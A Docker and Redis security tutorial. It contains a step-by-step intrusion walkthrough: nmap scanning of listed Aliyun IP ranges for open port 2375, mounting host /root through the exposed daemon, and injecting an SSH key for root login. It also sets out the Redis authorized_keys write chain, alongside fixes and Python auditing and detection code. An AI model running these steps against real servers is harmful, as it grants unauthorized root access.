Docker security
Docker security problems mainly fall into the following areas:
- By default Docker does not enable user namespace remapping, so the root user inside a container is the root user (UID 0) of the host. Once a host directory is mounted into the container, the mounted file system can be modified at will from inside the container, with host root privileges.
- The docker daemon runs with high privileges, and any ordinary user in the docker group can execute commands such as docker run, which amounts to root on the host.
- If the exposed Docker remote API port does not enable TLS verification, any machine that can connect to the Docker host can freely operate the docker daemon on it.
The following case is an illustration, excerpted from the post "Docker 2375 port intrusion server":
- Use nmap to scan port 2375. The main targets are Aliyun IP ranges, which can be found through Baidu:
42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China
42.120.0.0/16 Aliyun Computing Co., LTD China
42.121.0.0/16 Aliyun Computing Co., LTD China
42.156.128.0/17 Aliyun Computing Co., LTD China
110.75.0.0/16 Asia Pacific Network Information Centre China
110.76.0.0/19 Ali Technology Co., Ltd China
110.76.32.0/20 Aliyun Computing Co., LTD China
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China
112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China
115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China
119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China
119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
140.205.0.0/16 Aliyun Computing Co., LTD China
203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China
218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China
223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China
223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China
223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.
Save these IP ranges as aliyun.list, then execute the following command:
cat aliyun.list | awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open
# A brief explanation of the command:
# awk filters out the first column, the IP ranges
# xargs feeds the filtered IPs to nmap one at a time; -I {} means {} stands in for the passed argument
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...
Assume that the IP to be attacked after scanning is 127.0.0.1.
- Test the permissions of 2375
docker -H tcp://127.0.0.1:2375 ps
# CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh" 9 days ago Up 3 days 0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2 "rethinkdb --bind all" 9 days ago Up 3 days 8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago Up 3 days 0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine "nginx -g 'daemon off" 3 weeks ago Up 3 days 443/tcp, 0.0.0.0
# ...
This output comes back because port 2375 of the server's docker daemon does not enforce TLS verification.
- Start your own container remotely
# images: see which images already exist locally
# docker -H tcp://127.0.0.1:2375 images
# ...
# swarm latest 47dc182ea74b 4 weeks ago 19.32 MB
# jwilder/nginx-proxy latest 203b20631e41 4 weeks ago 255.6 MB
# ubuntu latest c5f1cf30c96b 4 weeks ago 120.8 MB
# shipyard/shipyard latest ba426f0944bc 5 weeks ago 58.92 MB
# ...
Choose an image, such as ubuntu
# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu
- ssh pub key injection
First, in the container you just started, look at the PermitRootLogin field in /tmp/ssh_etc/sshd_config (that is, the host's /etc/ssh/sshd_config). If it is no, change it to yes to allow root to log in over ssh.
Then generate a new key pair on your own machine (even if you already have an ssh key, generate a new one; do not use your everyday ssh key)
# generate with ssh-keygen
ssh-keygen -t rsa -C "[email protected]"
# watch the prompt "Enter file in which to save the key" after running the command, so you do not overwrite your own ssh key; /tmp/id_rsa is a reasonable choice
# just press Enter through the other prompts
Next, inject the ssh public key: go back to the container you just started and run
cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # paste the /tmp/id_rsa.pub you just generated on your own machine here
>EOF
# if the /tmp/root/.ssh directory does not exist, just create it first
- login server
# ssh -i specifies the key to log in with
ssh -i /tmp/id_rsa [email protected]
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~#
# ...
- How to fix this vulnerability: refer to the Docker documentation page Protect the Docker daemon socket (enable TLS with client certificate verification on the remote API, or do not expose it over TCP at all)
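As an added example (not part of the original post or of the excerpted case), the following Python audits a dockerd daemon.json against the points made in this section: a tcp:// host without tlsverify is exactly the open-2375 condition exploited in the case, a tls-only setting is the common half-fix that encrypts but still accepts any client, and a missing userns-remap is the first bullet (container root is host root on every bind mount). The three daemon.json samples are constructed for the example; the keys they use (hosts, tls, tlsverify, tlscacert, tlscert, tlskey, userns-remap) are real dockerd options, the finding strings are the example's own wording.

```python
"""Audit a Docker daemon.json for the exposures described in the section above.

Added example, not from the original post. The config samples are constructed;
the keys used are real dockerd daemon.json options.
"""
import json

# Constructed sample (not a real host): the kind of config behind an open 2375.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Constructed sample of a common half-fix: TLS on, but no client verification,
# so the connection is encrypted and still open to anyone who can reach it.
TLS_ONLY_DAEMON_JSON = """{
  "hosts": ["tcp://0.0.0.0:2376"],
  "tls": true,
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

# Constructed sample after following "Protect the Docker daemon socket":
# client certificates verified against our own CA, plus user namespace
# remapping so root inside a container is not UID 0 on the host.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem",
  "userns-remap": "default"
}"""


def audit_daemon_config(daemon_json: str) -> list:
    """Return a list of finding strings for a daemon.json text (empty == nothing found)."""
    cfg = json.loads(daemon_json)
    findings = []

    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    tlsverify = cfg.get("tlsverify") is True
    tls_material = all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey"))

    for host in tcp_hosts:
        if not tlsverify:
            # The case in the post: anyone who can reach the port drives the daemon,
            # i.e. "docker -H tcp://<ip>:2375 run -v /root:/tmp/root ..." works for them.
            findings.append(f"{host}: remote API without TLS client verification")
            if cfg.get("tls") is True:
                findings.append(f"{host}: tls is set but tlsverify is not, so the "
                                "server encrypts but still accepts any client")
        elif not tls_material:
            findings.append(f"{host}: tlsverify set but tlscacert/tlscert/tlskey incomplete")

    # First bullet of the section: without user namespace remapping, root in the
    # container is UID 0 on the host, so bind mounts are writable as host root.
    if not cfg.get("userns-remap"):
        findings.append("userns-remap not set: container root is host root on bind mounts")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_DAEMON_JSON),
                       ("tls-only", TLS_ONLY_DAEMON_JSON),
                       ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(text) or ["ok"])
```

With the hardened configuration the client side has to present a certificate signed by the same CA, for example docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H tcp://host:2376 ps; the plain docker -H tcp://host:2376 ps from the case is then rejected at the TLS handshake. Note that userns-remap does not close the remote API hole, it only limits what a container started through it can do to bind-mounted host files, so both findings have to be fixed.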
Redis security
A Redis attack mainly proceeds through the following steps:
- Scan for port 6379, confirm that the host runs Redis, and check whether it accepts connections without authentication (the precondition for the ssh login at the end)
- Connect with the redis client and execute redis commands, such as clearing all data
- Use config set dir to point the Redis data directory at /root/.ssh/
- Use config set dbfilename to set the RDB dump file name to authorized_keys
- Set a key such as crackit whose value is the malicious visitor's public key
- Execute bgsave; the save triggers an RDB dump, which writes the attacker's public key into authorized_keys
- The attacker ssh's to the redis server successfully
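The chain above leaves a very recognisable trace at the command level: one client redirects the dump directory and file name into a trusted path and then saves. As an added example (not from the original post), the following Python runs that detection over redis-cli MONITOR output. The MONITOR lines are constructed for the example; the line format itself, <timestamp> [<db> <client addr>] "<command>" "<args>"..., is the one redis-cli MONITOR prints, and the sensitive-path lists are the example's own choice.

```python
"""Detect the Redis authorized_keys write chain in redis-cli MONITOR output.

Added example, not from the original post. The MONITOR sample is constructed;
the line format is the one redis-cli MONITOR prints.
"""
import re
from collections import defaultdict

# Constructed sample MONITOR output reproducing the steps listed above, plus
# benign traffic from a second client that also runs BGSAVE.
SAMPLE_MONITOR = r'''
1465092000.100000 [0 120.85.1.2:40000] "PING"
1465092000.200000 [0 120.85.1.2:40000] "FLUSHALL"
1465092000.300000 [0 120.85.1.2:40000] "SET" "crackit" "\n\nssh-rsa AAAAB3NzaC1yc2E... attacker\n\n"
1465092000.400000 [0 120.85.1.2:40000] "CONFIG" "SET" "dir" "/root/.ssh/"
1465092000.500000 [0 120.85.1.2:40000] "CONFIG" "SET" "dbfilename" "authorized_keys"
1465092000.600000 [0 120.85.1.2:40000] "SAVE"
1465092001.000000 [0 127.0.0.1:51000] "GET" "session:42"
1465092001.100000 [0 127.0.0.1:51000] "BGSAVE"
'''

LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one quoted argument, escapes allowed

# Places where an attacker-controlled RDB dump becomes something the system
# executes or trusts (example's own list).
SENSITIVE_DIRS = ("/.ssh", "/etc/cron.d", "/var/spool/cron")
SENSITIVE_FILES = ("authorized_keys",)
KEY_MARKERS = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-")


def parse_monitor_line(line):
    """Return (timestamp, client, [command, args...]) or None for non-matching lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, _db, client, rest = m.groups()
    return float(ts), client, ARG_RE.findall(rest)


def detect_rdb_write_chain(monitor_text):
    """Flag clients that redirect the RDB dump into a sensitive path and then save."""
    state = defaultdict(dict)   # client -> pieces of the chain seen so far
    alerts = []                 # (client, timestamp, description)
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, args = parsed
        cmd = args[0].upper()
        seen = state[client]
        if cmd in ("FLUSHALL", "FLUSHDB"):
            alerts.append((client, ts, f"{cmd}: data wiped"))
        elif cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            if key == "dir" and any(d in value for d in SENSITIVE_DIRS):
                seen["dir"] = value
            elif key == "dbfilename" and value in SENSITIVE_FILES:
                seen["dbfilename"] = value
        elif cmd == "SET" and len(args) >= 3 and any(k in args[2] for k in KEY_MARKERS):
            seen["key"] = args[1]   # the payload key (crackit in the post)
        elif cmd in ("SAVE", "BGSAVE") and ("dir" in seen or "dbfilename" in seen):
            alerts.append((client, ts,
                           f"{cmd} after CONFIG SET dir={seen.get('dir')} "
                           f"dbfilename={seen.get('dbfilename')}; payload key={seen.get('key')}"))
            seen.clear()   # a normal BGSAVE from another client is never flagged
    return alerts


if __name__ == "__main__":
    for client, ts, what in detect_rdb_write_chain(SAMPLE_MONITOR):
        print(f"{ts:.3f} {client} {what}")
```

Why the dump works as a key file: the RDB file is binary, but sshd skips any authorized_keys line it cannot parse as a key, and the newline padding around the value puts the public key on a line of its own. MONITOR is expensive on a busy instance, so in practice this logic belongs in a proxy or in audit logging; better still, rename-command CONFIG "" from the defence list below removes step 3 of the chain altogether.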
Generally speaking, the corresponding defensive strategy is as follows:
- Set a sufficiently complex password and rotate it regularly. For a master-slave Redis deployment, remember to add masterauth to the slave node's configuration, otherwise master-slave synchronization fails
- Rename dangerous commands with rename-command, for example: keys (with many keys it may block Redis), flushall/flushdb (wipe all data), save (with many keys it may block Redis), debug (debug reload restarts Redis), config (should be reserved for administrators), shutdown (stops Redis)
- Set up a firewall
- Do not use the default port
- Start redis as a non-root user